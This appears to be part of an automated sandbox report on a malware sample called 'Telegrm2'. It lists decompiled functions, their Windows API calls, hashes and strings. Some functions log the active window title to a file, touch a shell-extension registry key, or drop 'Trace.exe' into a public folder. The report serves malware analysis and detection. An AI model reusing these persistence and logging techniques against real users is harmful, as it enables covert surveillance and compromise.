                                            • Opcode ID: 43b419fb72a149b508b4fa3a9eb989ac6178629c4940d7040fb184117e8c14ad
                                            • Instruction ID: 8250134fda505124fc2fad447fbc2f16be0882f8d083930705d0473d93763b2e
                                            • Opcode Fuzzy Hash: 43b419fb72a149b508b4fa3a9eb989ac6178629c4940d7040fb184117e8c14ad
                                            • Instruction Fuzzy Hash: 1A118265329A8291FB21DF11E8947DA63BAF7C8748F805112C78D47A64EF3DC30ACB10
                                            Function 030AF600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: CloseOpenValue
                                            • String ID: SOFTWARE\Classes\*\shellex$Start
                                            • API String ID: 779948276-205936948
                                            • Opcode ID: 0ca0d2eb96febe7c3f1de3174b521f459ddaae00c317af299b2ead55954e0038
                                            • Instruction ID: 40fccc8ce8ecdf5f4519212ee815f2330c53953c8e71e559fbdbe5f7cce10c99
                                            • Opcode Fuzzy Hash: 0ca0d2eb96febe7c3f1de3174b521f459ddaae00c317af299b2ead55954e0038
                                            • Instruction Fuzzy Hash: 1E018471315B8586DB50CF65F84474AB3A8F788794F405225EA8D43B68DF7CC249CB04
                                            Function 02DCB5F4 Relevance: 7.8, APIs: 5, Instructions: 268COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: b43a66ac7ff6aaea2afa98109b798b6886ea9ecbd7ee844780fc29dcba4b1917
                                            • Instruction ID: ba9f3b89007219d8a8bf2298c3edeb290139602b7a7ffb5d7db3156765251a09
                                            • Opcode Fuzzy Hash: b43a66ac7ff6aaea2afa98109b798b6886ea9ecbd7ee844780fc29dcba4b1917
                                            • Instruction Fuzzy Hash: C6718C30618B4A8FDB59AF2CD4966B577E1FB58304F20516EE88AC7352DE34EC42CB81
                                            Function 02DB7698 Relevance: 7.7, APIs: 5, Instructions: 187COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: free$mallocstd::exception::exception
                                            • String ID:
                                            • API String ID: 4069110180-0
                                            • Opcode ID: ec827b053d5fad73fcf0492e3d2725338dc407ece077524a1dae6e7b927291dc
                                            • Instruction ID: dab3b1712af5e771810190f73448c4a4c8d11ee57e2c6c6bf46dc9b99e2e462d
                                            • Opcode Fuzzy Hash: ec827b053d5fad73fcf0492e3d2725338dc407ece077524a1dae6e7b927291dc
                                            • Instruction Fuzzy Hash: 4E517D71A14B0E8FEB15EFA9D4657EDB7B2EF58300F60012EC00AE3251DB709849CB91
                                            Function 02DBCA18 Relevance: 7.7, APIs: 5, Instructions: 175COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: free$mallocstd::exception::exception
                                            • String ID:
                                            • API String ID: 4069110180-0
                                            • Opcode ID: 07180e9b4d2e60f22a41465041aba0a5742f0305ed2e05aa6cee22b514af3519
                                            • Instruction ID: 1b057e0ce893a08cbf1032694b361780e5f46dfd1e16ed8e9cde1a2f73e1c519
                                            • Opcode Fuzzy Hash: 07180e9b4d2e60f22a41465041aba0a5742f0305ed2e05aa6cee22b514af3519
                                            • Instruction Fuzzy Hash: 7B515C70528A0E8FDB5AEF99D4A4BEEB7A1FF58300F50416ED44AD3350DA30E905CB95
                                            Function 030BBC3C Relevance: 7.7, APIs: 5, Instructions: 168COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: free$__free_lconv_num
                                            • String ID:
                                            • API String ID: 1547021563-0
                                            • Opcode ID: 5065e57385be53cddd144326875eea5caec32167da9e295f80e2a71d4d12b0bb
                                            • Instruction ID: 71ff147bfc072a48c7e84676f8234b06cd9d2989c1fa54e0f7133b9b8ab6d8d3
                                            • Opcode Fuzzy Hash: 5065e57385be53cddd144326875eea5caec32167da9e295f80e2a71d4d12b0bb
                                            • Instruction Fuzzy Hash: 1E515B36306B848ACB65DF66E4907EEB7B4F789B84F4444269F9A4B724EF78C142C740
                                            Function 02DC6B98 Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _lock$_errno_getptd_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2808128820-0
                                            • Opcode ID: 9f4985a2a933d0fc62c1a2c77e0ed4ea76d4ee0366b7b778643bc997e4b882e3
                                            • Instruction ID: 93317e66585208ad2b9037e638a5cc448f26db57514c3c14e3a0f1e717877d89
                                            • Opcode Fuzzy Hash: 9f4985a2a933d0fc62c1a2c77e0ed4ea76d4ee0366b7b778643bc997e4b882e3
                                            • Instruction Fuzzy Hash: 9041E430618A0A8FEB48EB2CE4507B937D2FB88314F64456DD84EC7395DE74EC018BA6
                                            Function 030B71E0 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _lock$_errno_getptd_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2808128820-0
                                            • Opcode ID: 390c6bb1f917f199c5f93b74c9e05a175f32bba1d00271662873cc79a0fef33e
                                            • Instruction ID: 66c3c2ca52d92b8dec6e94499ca6295d829d6739e9e6e85f580b2488ac83991b
                                            • Opcode Fuzzy Hash: 390c6bb1f917f199c5f93b74c9e05a175f32bba1d00271662873cc79a0fef33e
                                            • Instruction Fuzzy Hash: F741893920778481EB49EB62E9607EE63B5FBC5FC4F184529DE890B794DF39C1418314
                                            Function 030BA9F4 Relevance: 7.6, APIs: 5, Instructions: 102COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(?,?,00000000,00000000,0000000A,00000008,?,030BABAF), ref: 030BAA4E
                                            • malloc.LIBCMT ref: 030BAAB2
                                            • MultiByteToWideChar.KERNEL32(?,?,00000000,00000000,0000000A,00000008,?,030BABAF), ref: 030BAAFA
                                            • GetStringTypeW.KERNEL32(?,?,00000000,00000000,0000000A,00000008,?,030BABAF), ref: 030BAB11
                                            • free.LIBCMT ref: 030BAB25
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$StringTypefreemalloc
                                            • String ID:
                                            • API String ID: 307345228-0
                                            • Opcode ID: 624ff6f150ac1bca46106fffcf5fdbb5924f40ec827969393160b6a261c2b37d
                                            • Instruction ID: 9e019bda0e4d38619f9631f35b45eb9c0868b49902f85a7109075c5bf83f75c1
                                            • Opcode Fuzzy Hash: 624ff6f150ac1bca46106fffcf5fdbb5924f40ec827969393160b6a261c2b37d
                                            • Instruction Fuzzy Hash: D0316D22712B80CADB21CF66D8106D977E9FB88BB8F5C4616EE2D477D4EB39C4418710
                                            Function 030C33D8 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                            Download Yara Rule
                                            APIs
                                            • _ctrlfp.LIBCMT ref: 030C3419
                                            • _exception_enabled.LIBCMT ref: 030C343C
                                              • Part of subcall function 030C331C: _set_statfp.LIBCMT ref: 030C3343
                                              • Part of subcall function 030C331C: _set_statfp.LIBCMT ref: 030C33B6
                                            • _raise_exc.LIBCMT ref: 030C3488
                                            • _ctrlfp.LIBCMT ref: 030C34C8
                                            • _ctrlfp.LIBCMT ref: 030C34F9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _ctrlfp$_set_statfp$_exception_enabled_raise_exc
                                            • String ID:
                                            • API String ID: 3456427917-0
                                            • Opcode ID: 3efbf31656fb0a7497a4a162f2df533203dee1acf325f53067fe5430004c8814
                                            • Instruction ID: b6ee1c1670268a4022babc56f0e12714ec4e3127ae90a0e6d847aaee713db52b
                                            • Opcode Fuzzy Hash: 3efbf31656fb0a7497a4a162f2df533203dee1acf325f53067fe5430004c8814
                                            • Instruction Fuzzy Hash: 02319F3A635B848AD751DF25E8502AFB775FBCA788F044259EE891BA18DF3CC441CB00
                                            Function 030B3E80 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • RtlDecodePointer.NTDLL ref: 030B3EA9
                                            • RtlDecodePointer.NTDLL ref: 030B3EB9
                                              • Part of subcall function 030B846C: _errno.LIBCMT ref: 030B8475
                                              • Part of subcall function 030B846C: _invalid_parameter_noinfo.LIBCMT ref: 030B8480
                                            • RtlEncodePointer.NTDLL ref: 030B3F37
                                              • Part of subcall function 030B5400: realloc.LIBCMT ref: 030B542B
                                              • Part of subcall function 030B5400: Sleep.KERNEL32(?,?,00000000,030B3F27,?,00000000,?,030B3F95,?,?,?,?,030B330B), ref: 030B5447
                                            • RtlEncodePointer.NTDLL ref: 030B3F47
                                            • RtlEncodePointer.NTDLL ref: 030B3F54
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                                            • String ID:
                                            • API String ID: 1909145217-0
                                            • Opcode ID: 78e45ef783413b217608e0a16efdd3366037ad4d8c45b9786596f5e959a3f801
                                            • Instruction ID: 29de684847fa85b3d45d21905fdc3a3df30a6b05cc03f98ca4c37a9b67f9a191
                                            • Opcode Fuzzy Hash: 78e45ef783413b217608e0a16efdd3366037ad4d8c45b9786596f5e959a3f801
                                            • Instruction Fuzzy Hash: 85218025717B4291DA05DBA6F9A439AA3B5F789FC0F945865EE0E0B714EF3CC285C308
                                            Function 030ADD70 Relevance: 7.6, APIs: 5, Instructions: 61stringtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetForegroundWindow.USER32 ref: 030ADD9F
                                            • GetWindowTextA.USER32 ref: 030ADDBC
                                            • lstrlen.KERNEL32 ref: 030ADDF5
                                            • GetLocalTime.KERNEL32 ref: 030ADE04
                                            • wsprintfA.USER32 ref: 030ADE54
                                              • Part of subcall function 030ADCA0: WaitForSingleObject.KERNEL32 ref: 030ADCBC
                                              • Part of subcall function 030ADCA0: CreateFileA.KERNEL32 ref: 030ADCEE
                                              • Part of subcall function 030ADCA0: SetFilePointer.KERNEL32 ref: 030ADD13
                                              • Part of subcall function 030ADCA0: lstrlen.KERNEL32 ref: 030ADD1C
                                              • Part of subcall function 030ADCA0: WriteFile.KERNEL32 ref: 030ADD39
                                              • Part of subcall function 030ADCA0: CloseHandle.KERNEL32 ref: 030ADD42
                                              • Part of subcall function 030ADCA0: ReleaseMutex.KERNEL32 ref: 030ADD54
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: File$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
                                            • String ID:
                                            • API String ID: 3163932117-0
                                            • Opcode ID: 9c2e0b957a80f6091012f204cde0cca7ec84f3484f66381548a359e3a2c0dc0e
                                            • Instruction ID: 7bcd92e5e3db3d9aa20e622a066b716d6ab680ccbbbcce9868f75dd64bd7db2d
                                            • Opcode Fuzzy Hash: 9c2e0b957a80f6091012f204cde0cca7ec84f3484f66381548a359e3a2c0dc0e
                                            • Instruction Fuzzy Hash: 853161B1219A8582E761DF55F8903AAB7B9F784B44F409025EA8E47A64EF3CC349CF04
                                            Function 030B98D0 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32 ref: 030B9907
                                            • GetCurrentProcessId.KERNEL32 ref: 030B9912
                                            • GetCurrentThreadId.KERNEL32 ref: 030B991E
                                            • GetTickCount.KERNEL32 ref: 030B992A
                                            • QueryPerformanceCounter.KERNEL32 ref: 030B993B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                            • String ID:
                                            • API String ID: 1445889803-0
                                            • Opcode ID: 3fc3725ca8a288ac075f2860f78d41a9700cbea2c759c06011dc5ba40e0d3bd0
                                            • Instruction ID: 3333da55dfe3cbb1d3c29df5a40000b7e7b081ded60ca6a78d9c79e9ca48fd99
                                            • Opcode Fuzzy Hash: 3fc3725ca8a288ac075f2860f78d41a9700cbea2c759c06011dc5ba40e0d3bd0
                                            • Instruction Fuzzy Hash: 5C019235226B0082E782CF26F86439573A4F749B90F447620EFAE47760DF3CCA858704
                                            Function 00007FF7AA332B4C Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904906812.00007FF7AA311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AA310000, based on PE: true
                                            • Associated: 00000000.00000002.2904893958.00007FF7AA310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2904931037.00007FF7AA33D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2904948098.00007FF7AA34D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2904948098.00007FF7AA352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2904978853.00007FF7AA356000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2904978853.00007FF7AA368000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2904978853.00007FF7AAD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2904978853.00007FF7AB768000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7aa310000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                            • String ID:
                                            • API String ID: 1445889803-0
                                            • Opcode ID: 899356b22001d9c8fbe9eb7f26d7b29da52992edea5648de9b2842fb6bbd3c41
                                            • Instruction ID: 9f685a18c78152973162bd970ff02e2ebd8f088b2ed10abae3b16bab5448b7af
                                            • Opcode Fuzzy Hash: 899356b22001d9c8fbe9eb7f26d7b29da52992edea5648de9b2842fb6bbd3c41
                                            • Instruction Fuzzy Hash: 81016521A5EE01C2F7409F21E840165A360FF45BD1F956575EE5E477B4CF3CD8968320
                                            Function 030AE600 Relevance: 7.5, APIs: 5, Instructions: 37sleepsynchronizationthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: CloseHandle$ObjectSingleSleepTerminateThreadWait
                                            • String ID:
                                            • API String ID: 3303361366-0
                                            • Opcode ID: f04e112ffcfac24b603780264897768af899bb09a0afb112039c9e615b1336e8
                                            • Instruction ID: 1c2e47f3f269aa7a956d2c08b4a14454057152c3c99588cf0eb4882ac04d834f
                                            • Opcode Fuzzy Hash: f04e112ffcfac24b603780264897768af899bb09a0afb112039c9e615b1336e8
                                            • Instruction Fuzzy Hash: 0D012D32626B80C6EB55CF65F8A43997368F7C4B84F489621DAAE03754DF38D546C704
                                            Function 02DC3A64 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 99COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 02DC2CEC: _getptd.LIBCMT ref: 02DC2CFE
                                            • _errno.LIBCMT ref: 02DC3A91
                                            • _invalid_parameter_noinfo.LIBCMT ref: 02DC3A9C
                                              • Part of subcall function 02DC8670: iswctype.LIBCMT ref: 02DC86DD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno_getptd_invalid_parameter_noinfoiswctype
                                            • String ID: A$Z
                                            • API String ID: 3686281101-4098844585
                                            • Opcode ID: 28c99b5ff7c153519cc676a4e33103c39524cc50a50e3399b67c0a2bdb34ff0a
                                            • Instruction ID: 7ddb48fee928a6a4f7b9082042fc1f18bdc5230c3e94eed8668bd2b4d397e975
                                            • Opcode Fuzzy Hash: 28c99b5ff7c153519cc676a4e33103c39524cc50a50e3399b67c0a2bdb34ff0a
                                            • Instruction Fuzzy Hash: F521E331918B9B8FC7A4BB188054676B7E1FB54324FB8829EE4D9C7390CB64CC81C792
                                            Function 02DD0EC9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _getptd
                                            • String ID: csm
                                            • API String ID: 3186804695-1018135373
                                            • Opcode ID: 3d7b47e0f6bab72505bbf465c5b16e1dcb4b87de87066540f1dd17ecd2e8909f
                                            • Instruction ID: 576ddc1d4bb49586bb8f4bd1553b25d6f42559690b275b0a184c656a614bfd65
                                            • Opcode Fuzzy Hash: 3d7b47e0f6bab72505bbf465c5b16e1dcb4b87de87066540f1dd17ecd2e8909f
                                            • Instruction Fuzzy Hash: 82312D30218B048FDB68EF58E490B69B3E1FBD8312F500A6DD48A83751D735EC46CB96
                                            Function 030C312C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno_fltout2_invalid_parameter_noinfo
                                            • String ID: -
                                            • API String ID: 485257318-2547889144
                                            • Opcode ID: 85744a4e42e8deba6d255352ecd3451221b6f726af6d25e6dfe1bb7ea0535f6c
                                            • Instruction ID: f072620bc9a6265dabaee72ac3dada41873393687635d8fd6b552e600e98663d
                                            • Opcode Fuzzy Hash: 85744a4e42e8deba6d255352ecd3451221b6f726af6d25e6dfe1bb7ea0535f6c
                                            • Instruction Fuzzy Hash: 5F31F73A3367C086DA21DB25A84479EB7A4A785BE4F188259DF9807B98DF3DC445CB00
                                            Function 030B40AC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030B3334: _getptd.LIBCMT ref: 030B3346
                                            • _errno.LIBCMT ref: 030B40D9
                                            • _invalid_parameter_noinfo.LIBCMT ref: 030B40E4
                                              • Part of subcall function 030B8CB8: iswctype.LIBCMT ref: 030B8D25
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno_getptd_invalid_parameter_noinfoiswctype
                                            • String ID: A$Z
                                            • API String ID: 3686281101-4098844585
                                            • Opcode ID: 9b323287f404c49a3f20f3a616a32b7aec9bc5b119120eae76ca383d52d5c6ec
                                            • Instruction ID: 592e2b1526f9b7d83d9e915c64ea2d8e99f143e023b5dc3db12c0a249a59b1b4
                                            • Opcode Fuzzy Hash: 9b323287f404c49a3f20f3a616a32b7aec9bc5b119120eae76ca383d52d5c6ec
                                            • Instruction Fuzzy Hash: 6121A6B6E1679182DB70DB5B94501FDB7F0E390BA0B9C8612EBD907799DA28C681C704
                                            Function 030C3728 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfo
                                            • String ID: 1
                                            • API String ID: 2819658684-2212294583
                                            • Opcode ID: afbaa54ebbd6e34134930dda8989b8d5aa3615fc9adbfe3c6709945b5ede5d8a
                                            • Instruction ID: 3e8a5ba03084c30d64aa36e2c041b23d608ef7bfde697368c4579680c518e40d
                                            • Opcode Fuzzy Hash: afbaa54ebbd6e34134930dda8989b8d5aa3615fc9adbfe3c6709945b5ede5d8a
                                            • Instruction Fuzzy Hash: 18113AAE23B7C086E76BDF3494143AEAEA4EB41B44F8DC5D9C6420B742D62EC940CF11
                                            Function 030B3290 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _callnewh.LIBCMT ref: 030B329E
                                            • malloc.LIBCMT ref: 030B32AA
                                              • Part of subcall function 030B5728: _FF_MSGBANNER.LIBCMT ref: 030B5758
                                              • Part of subcall function 030B5728: RtlAllocateHeap.NTDLL ref: 030B577D
                                              • Part of subcall function 030B5728: _callnewh.LIBCMT ref: 030B5796
                                              • Part of subcall function 030B5728: _errno.LIBCMT ref: 030B57A1
                                              • Part of subcall function 030B5728: _errno.LIBCMT ref: 030B57AC
                                            • std::exception::exception.LIBCMT ref: 030B3317
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _callnewh_errno$AllocateHeapmallocstd::exception::exception
                                            • String ID: bad allocation
                                            • API String ID: 608171114-2104205924
                                            • Opcode ID: ad2d471b0e770cd37b436c7ec67732159fce59fe50aa9765b18297957d3ba879
                                            • Instruction ID: 7a94f3dc4f54b42482fff7be2a763bce7b083c9aed0b99f4db17de891b48adc9
                                            • Opcode Fuzzy Hash: ad2d471b0e770cd37b436c7ec67732159fce59fe50aa9765b18297957d3ba879
                                            • Instruction Fuzzy Hash: 64015E7935670981EF25EB11F8903D9A3B8B799344F585595C98D4B764EF3CC349C700
                                            Function 030AF2D0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • C:\Users\Public\Music\Trace.exe, xrefs: 030AF2DC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateHandleWrite
                                            • String ID: C:\Users\Public\Music\Trace.exe
                                            • API String ID: 1065093856-248444187
                                            • Opcode ID: 53b92b6cd56feaf15b65a536e72328d75669480d2c299fcd8d3bec73b883eb25
                                            • Instruction ID: ba0f8970fc193efe0ebebe7f6d7cce1dee7673de4ac125764020ef9946c311d0
                                            • Opcode Fuzzy Hash: 53b92b6cd56feaf15b65a536e72328d75669480d2c299fcd8d3bec73b883eb25
                                            • Instruction Fuzzy Hash: FD01D63271574083E7508F69F95434AB3A4F7887F8F445325EBAA03B98DBBCC2448B04
